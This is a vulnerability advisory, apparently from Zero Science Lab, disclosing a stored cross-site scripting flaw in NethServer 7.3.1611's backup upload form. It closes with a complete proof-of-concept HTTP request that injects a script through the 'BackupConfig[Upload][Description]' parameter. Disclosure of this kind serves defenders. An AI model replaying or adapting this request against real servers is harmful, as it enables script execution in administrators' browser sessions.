NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability


Vendor: NethServer.org
Product web page: https://www.nethserver.org
Affected version: 7.3.1611-u1-x86_64

Summary: NethServer is an operating system for the Linux enthusiast,
designed for small offices and medium enterprises. It's simple, secure
and flexible.

Desc: NethServer suffers from an authenticated stored XSS vulnerability.
Input passed to the 'BackupConfig[Upload][Description]' POST parameter is
not properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.

Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64
           CentOS Linux 7.3.1611 (Core)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5432
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5432.php


16.08.2017

--


PoC request:

POST /en-US/BackupConfig/Upload.json HTTP/1.1
Host: 172.19.0.195:980
Connection: close
Content-Length: 15762
Accept: */*
Origin: https://172.19.0.195:980
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80
Referer: https://172.19.0.195:980/en-US/BackupConfig
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2

------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz"
Content-Type: application/x-xz

[xz content omitted]
------WebKitFormBoundary8FfEu2Tn6fUOnT80
Content-Disposition: form-data; name="BackupConfig[Upload][Description]"

<script>confirm(017)</script>
------WebKitFormBoundary8FfEu2Tn6fUOnT80--